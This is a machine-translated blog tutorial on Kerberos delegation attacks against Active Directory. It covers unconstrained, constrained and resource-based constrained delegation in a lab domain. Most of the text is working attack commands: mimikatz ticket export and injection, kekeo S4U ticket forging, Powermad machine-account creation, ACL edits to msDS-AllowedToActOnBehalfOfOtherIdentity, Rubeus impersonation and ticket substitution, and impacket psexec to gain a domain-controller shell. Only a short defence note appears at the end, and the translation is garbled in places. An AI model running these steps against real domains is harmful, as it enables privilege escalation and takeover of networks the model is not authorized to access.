Delegation attack of Intranet penetration and lateral mobility

** Welcome to my WeChat official account. 《 The soul in the shell 》**

Delegation usually occurs in the domain environment . It's a mechanism , stay kerberos Certification will involve . Incorrect delegation configuration , It may enable the attacker to achieve the purpose of raising power .

The difference between constrained delegation and unconstrained delegation

In fact, the types of delegation are different

Delegating any service is unconstrained delegation

Delegating a specific task is called constrained delegation

There is actually a third kind of delegation , It's called resource - based delegation

In order to make users / Resources are more independent , Microsoft is in Windows Server 2012 Resource Based Constraint delegation is introduced in . Resource Based Constraint delegation does not require domain administrator privileges to set , The authority to set attributes is given to the machine itself . Resource based binding delegation allows resources to configure trusted accounts to delegate to them . Resource Based Constraint delegation can only be run WindowsServer2012 and Windows Server 2012R2 And above , But it can be applied in mixed mode forest . Account with resource-based constraint delegation configured userAccountControl The attribute is WORKSTATION_TRUST_ACCOUNT, also msDS-AllowedToActOnBehalfOfOtherIdentity The value of the attribute is the value of the account that is allowed to delegate based on resource constraints SID.

Permission to delegate is granted to the backend that owns the resource (B), It's not the front end anymore (A)

Delegation across domains cannot be constrained , Resource based constrained delegation can span domains and forests

You no longer need to set up the delegate for the domain administrator rights , Only have to edit on the computer object ”msD S-AllowedToActOnBehalfOfOtherIdentity” Property , That is, the domain user who joins the computer to the domain and The machine itself Have authority .

The traditional constraint delegate is “ positive ”, By modifying the service A Properties of ”msDS-AllowedToDelegateTo”, Add service B Of SPN（Service Principle Name）, Sets the constraint delegate object （ service B）, service A You can simulate a user requesting access to a service from a domain controller B Of ST Service ticket .

Resource-based constraint delegation is the opposite , By modifying the service B attribute ”msDS-AllowedToActOnBehalfOfOtherIdentity”, Add service A Of SID, Enable service A Mock user access B Purpose of resources .

More details about delegation can be found in this article ：(12 Bar message ) windows About delegation in (delegation) The understanding of the _Shanfenglan's blog-CSDN Blog

About Kerberos Authentication can be seen in this article ：Kerberos Protocol authentication process （ Theory Chapter ） - FreeBuf Network security industry portal

Unconstrained delegation

⽤ Household A Go to the service B, service B Your service account has been opened ⾮ Constraints to delegate , So when ⽤ Household A Access the service B Will be ⽤ Household A Of TGT Send to service B And save it into memory , service B Can benefit ⽤⽤ Household A To visit ⽤ Household A Any service that can be accessed

Use principle

If a host is set to unrestricted delegation , When a user accesses this host , Will put their own TGT Send to this host , meanwhile , this TGT Will be saved in memory (lsass.exe) For subsequent use , If we can induce the domain controller to access this host , The domain controller will put its TGT Send to this host , If we can get the connection with the controller TGT You can generate gold notes

Create unconstrained delegated users

stay Windows In the system , Only the properties of service account and host account have delegation function , Ordinary ⽤ It is not available by default

There are some users that cannot be set as delegated , It's better than checking here

First, we need to create an ordinary account , Then register SPN Turn it into a service account

setspn -U -A MSSQLSvc/mssql.g1ts.com:1433 xweipai 

This account name must be an existing account , If not, it cannot be created as a service account , You can also create a new account

If this account does not exist, this... Will be displayed

Create success

Then open the delegate properties

We can judge whether the user is a non constrained delegate by viewing the user's properties

stay userAccountControl Will show

Find in domain ⾮ Constraints to delegate ⽤ Users and computers

Use Adfind

Download address ：Download AdFind 1.56.00 (softpedia.com)

Common commands ：

AdFind [switches] [-b basedn] [-f filter] [attr list] 

 List the domain controller names ：
AdFind -sc dclist

 Query the online computers in the current domain ：
AdFind -sc computers_active

 Query the online computers in the current domain ( Show only the name and operating system )：
AdFind -sc computers_active name operatingSystem

 Query all computers in the current domain ：
AdFind -f "objectcategory=computer"

 Query all computers in the current domain ( Show only the name and operating system )：
AdFind -f "objectcategory=computer" name operatingSystem

 Query all users in the domain ：
AdFind -users name

 Query all GPO：
AdFind -sc gpodmp

Query all non delegated users in the current domain

AdFind.exe -b "DC=g1ts,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName 

⾮ Restrict delegation attacks

take winser2012 This one Host account ( It was a service account ) Set to unconstrained delegation

When we use a domain controller (winser2016) To visit winser2012 when , Will be in 2012 Stay on TGT

Here I use powershell Direct connection

Enter-PSSession -ComputerName winser2012 

After this connection , The credentials of the domain controller have been left in winser2012 Yes

Then we use the service account just created to log in to the accessed service host ( It must be a service account ), After landing , To avoid interference , First use mimikatz Get rid of all the bills

privilege::debug
kerberos::purge 

Then export the bills in the host ( My domain controller is still connected to winser2012)

sekurlsa::tickets /export 

It is found that many bills have been exported , Select domain administrator @krgtbt- Domain name ticket

Log in to an unrestricted delegated account , Then import the ticket into

kerberos::ptt [0;b6f74][email protected] 

And then you can use kerberos::list View tickets in memory

Notice the red box here , I couldn't do it at first , It is found that the bill has expired (END More time than start It's even earlier , I don't know how to do it ), It is suspected that it may be due to the problem of expiration that it is unable to access

Visit again at this time , You can successfully access the domain controller

When the experiment was wrong , I used two versions of windows, Use windwos server 2008 when , Connect with a domain controller 2008 An error will be displayed

It's time to 2008 Just configure it

Use ideas

1. Through the first ldapsearch perhaps adfind perhaps powerview Query the machines configured with non binding delegation in the domain .

2. Then the target machine permissions .

3. Induce the domain administrator to delegate our machine ( By using phishing or printer which vulnerability ).

4. Get the domain management TGT

5. Domain managed TGT Inject

Constraints to delegate

principle

You can see from above , Unconstrained delegation is quite insecure , The domain controller's TGT You can access any task with the permission of the domain controller , So Microsoft introduced constrained delegation , Also expanded kerberos agreement , Added s4u2self And s4u2proxy agreement , To increase security .

Create a constrained delegated user

When the service account or host is set to binding delegation , Its userAccountControl Attribute contains TRUSTED_TO_AUTH_FOR_DELEGATION, And msDS-AllowedToDelegateTo Properties will contain the constrained Services

Then configure the service account

Enter the host name of the domain controller , Then check the name , It is automatically updated to the name of the domain controller , Then click OK

add to cifs service

Find constraint delegate user

AdFind.exe -h [dc's ip] -u [username] -up [password] -b "domain" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
AdFind.exe -h 10.10.10.10 -u testuser -up [email protected]#456 -b "DC=g1ts,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

Restrict delegation attacks

kekeo( Do not kill ) Download address ;igentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in C (github.com)

utilize kekeo request TGT

tgt::ask /user:weipai /domain:g1ts.com /password:[email protected]#456 

You can leave the password blank , Instead, use hashes /ntlm:[ntlm Hash]

Through this TGT forge s4u Request for administrator Access as a user winser2012 Of CIFS Of ST

tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/winser2016.g1ts.com

S4U2Self Acquired ST1 as well as S4U2Proxy Acquired AD-2008 CIFS Service ST2 Will be saved in the current ⽬ Record

Login constraint delegation account , And then use mimikatz Inject this note , Before that, clear the ticket in memory

Resource based delegation

Resource based constrained delegation (RBCD： Resource Based Constrained Delegation)： In order to make ⽤ Household / Resources are more independent ⽴, Microsoft is in Windows Server 2012 Middle quotation ⼊ A resource-based constraint delegation . Resource Based Constraint delegation does not require domain administrator privileges to set ,⽽ Give the permission to set properties to the machine ⾃ body -- Resource based binding delegation allows resources to configure trusted accounts to delegate to them .

Resource - Based Constraint delegation can only be used in transit ⾏ Windows Server 2012 and Windows Server 2012 R2 And above , But the constrained delegation of resources can cross domain forest and cross domain .

Create an account

Two points are needed to implement a resource-based delegation attack

• Machine account
• You can modify msDS-AllowedToActOnBehalfOfOtherIdentity The account of
• msDS-AllowedToActOnBehalfOfOtherIdentity

The user can impersonate as any user in the domain and then authenticate with the computer . If you can configure the value of this attribute We have got the password Machine account Words , Then we can control the host configured with this attribute as any member .

Be careful , What we need Machine account , The reason is that... Will be used in the attack process S4U2Self agreement , It only applies to those who have SPN Account , Different accounts do not SPN Of

• Get one that can be modified msDS-AllowedToActOnBehalfOfOtherIdentity The account of

Want to find this kind of account , You can find fields that contain mS-DS-CreatorSID Value users , This value will also appear in the account that adds the user to the domain ( This sentence is more around , Let me actually demonstrate )

First of all, understand , Domain administrators are not the only ones who have the right to add ordinary users to the domain , An ordinary domain user can also , stay g1ts domain , There is a domain administrator administrator, One domain ordinary user testuser, Then we create a new domain user , It is used to test adding ordinary users to the domain

Then I will host win7&10 Join the domain

So for win7&10 Come on ,join You can modify them msDS-AllowedToActOnBehalfOfOtherIdentity The account of , It will be verified later

• Machine account

Users in the domain have an attribute called ms-ds-MachineAccountQuota, It represents the number of computer accounts that users are allowed to use in the domain , The default is 10. This means that if we have a common domain user, we can use this user to create up to ten new computer accounts, that is, machine accounts .

Resource based delegation attacks

First, log in to the join user

1、 Find the target that can be attacked

Suppose we get the account of a domain user , We want to conduct a resource-based delegation attack , First of all, check whose current account can be modified msDS-AllowedToActOnBehalfOfOtherIdentity Property value

Use powerview Script , Included in powersploit in ,powersploit Can be in github download

First, find the current account SID

whoami /all 

• S-1-5-21-3960071969-2362883727-1949664287-1120

take powerview.ps1 Import , Use command

Get-DomainObjectAcl | ?{$_.SecurityIdentifier -match "S-1-5-21-3960071969-2362883727-1949664287-1120"} | select objectdn,activedirectoryrights 

It is just what we have just added win7&10

Be careful ： If activedirectoryrights The value of is not fully controlled (genericall) perhaps writeproperty Words , You may not be able to change the attribute value of the target host

2、 Add machine account

Use powermad Script

Download address ：https://github.com/Kevin-Robertson/Powermad

First import the script , And then execute the command

//New-MachineAccount -MachineAccount [username] -Password $(ConvertTo-SecureString "[userpassword]" -AsPlainText -Force)
New-MachineAccount -MachineAccount hack -Password $(ConvertTo-SecureString "hackyou" -AsPlainText -Force)

Check the machine accounts in the current domain

net group "domain computers" /domain 

You can see that the account has been created

3、 Query the added machine account SID

dsquery computer | dsget computer -dn -sid 

Download address ：https://github.com/shanfenglan/test

// download Microsoft.ActiveDirectory.Management.dll

Import dll Execute the command after the file

Get-ADComputer [username]
Get-ADComputer hack 

Or use powerview Script

Get-DomainComputer -Identity hack | select objectsid 

4、 modify msDS-AllowedToActOnBehalfOfOtherIdentity

The command needs to be run with administrator privileges

stay windows server 2012 above

Import Microsoft.ActiveDirectory.Management.dll Execute the command after the file

Set-ADComputer winser2016 -PrincipalsAllowedToDelegateToAccount hack$ 

stay windows server 2012 following

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3960071969-2362883727-1949664287-1120)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer winser2016| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

( To use the following command, you need to import the dll file , But I'm using win7、windows server 2008 Import failed , So the following command cannot be used , This error estimates and net framwork It's about )

Verify that the modification was successful

Use powerview Script

Get-DomainComputer winser2016 -Properties msds-allowedtoactonbehalfofotheridentity 

If there is echo, the setting is successful

5、 attack

Use Rubues

Rubeus.exe hash /user:hack /password:hackyou /domain:g1ts.com // obtain rc4 Hash  

Rubeus.exe s4u /user:hack$ /rc4:D9690F7EBA3280895F40968371AEBC1E /impersonateuser:Administrator /msdsspn:cifs/winser2016 /ptt 

however , In the course of my test , As shown in the screenshot above , It uses windows server 2012, After the operation , But not dir Domain controlled c disc , Use miikatz View the tickets in the current memory , It is found that the new ticket has been used and has not expired , I don't know why I can't access the domain controller c disc

I'll use it later win10 Perform the operation , It turned out to be all right

Use impacket

First, install impacket, Installation and download can be done in GitHub Official website view

python getST.py -dc-ip 10.10.10.10 -spn cifs/winser2016 -impersonate administrator g1ts.com/hack$:hackyou 

After execution, a ticket will be generated in the current folder

set KRB5CCNAME=administrator.ccache
python psexec.py -no-pass -k winser2016

Successfully obtained domain controlled shell

Users cannot delegate

Applicable to the target situation ：administrator It is set as a sensitive account and cannot be delegated 、 Joined the protected user group

You can use the command to query

Get-ADUser administrator -Properties AccountNotDelegated, Memberof 

At this point, execute the previous command

Rubeus.exe s4u /user:hack$ /rc4:D9690F7EBA3280895F40968371AEBC1E /impersonateuser:Administrator /msdsspn:cifs/winser2016 /ptt 

You can find S4U2self Succeeded in forwarding , and S4U2proxy Forwarding failed

have access to Rubeus Check it out. base64 The meaning of the string

Rubeus.exe describe /ticket:[ Content ] 

You can see that the service name is missing

hold base64 After the string is copied , Store in ticket.kribi In file , Because of being base64 encryption , So decrypt it , After decryption, you can directly use Rubeus Replace the contents directly

Rubeus.exe tgssub /ticket:ticket.kirbi /altservice:cifs/winser2016 /ptt 

Other query tools

ldapsearch

kali Upper self-contained , You can query on the Internet

have access to ldapsearch -h To see the usage

Find the user in the domain that is configured with unconstrained delegation

ldapsearch -x -H ldap://10.10.10.10:389 -D "CN=g1ts,CN=Users,DC=g1ts,DC=com" -w password -b "DC=g1ts,DC=com" "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" |grep -iE "distinguishedName" 

Find the hosts in the domain that are configured for unconstrained delegation ：

ldapsearch -x -H ldap://10.10.10.10:389 -D "CN=g1ts,CN=Users,DC=g1ts,DC=com" -w password -b "DC=g1ts,DC=com" "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" |grep -iE "distinguishedName" 

The difference between a service user and a host is samAccountType=805306368 (0x30000000) For the user ,samAccountType=805306369 (0x30000001) Is the host

Powerview.ps1

Query unconstrained delegation machines

Get-NetComputer -Unconstrained -Domain g1ts.com | select cn 

Query constraint delegation machine

Get-DomainComputer -TrustedToAuth -Domain g1ts.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto 

Defend against delegated attacks

1、 Not set as non delegating under special requirements ( That is, set as a sensitive account )

2、 To prevent credentials from being stolen, Microsoft launched Protected Users Group , Apply to Windows Server 2016,Windows Server 2012 R2、 Windows Server 2012

Reference article ：

(12 Bar message ) be based on windows Attack ideas in ( On )- Binding delegation and non binding delegation _Shanfenglan's blog-CSDN Blog _ Delegating attacks

(12 Bar message ) windows About delegation in (delegation) The understanding of the _Shanfenglan's blog-CSDN Blog

Domain infiltration ——Kerberos Delegating attacks - The prophet community (aliyun.com)

kerberos Delegation details - FreeBuf Network security industry portal

(13 Bar message ) be based on windows Attack ideas in ( Next )- Resource based constrained delegation _Shanfenglan's blog-CSDN Blog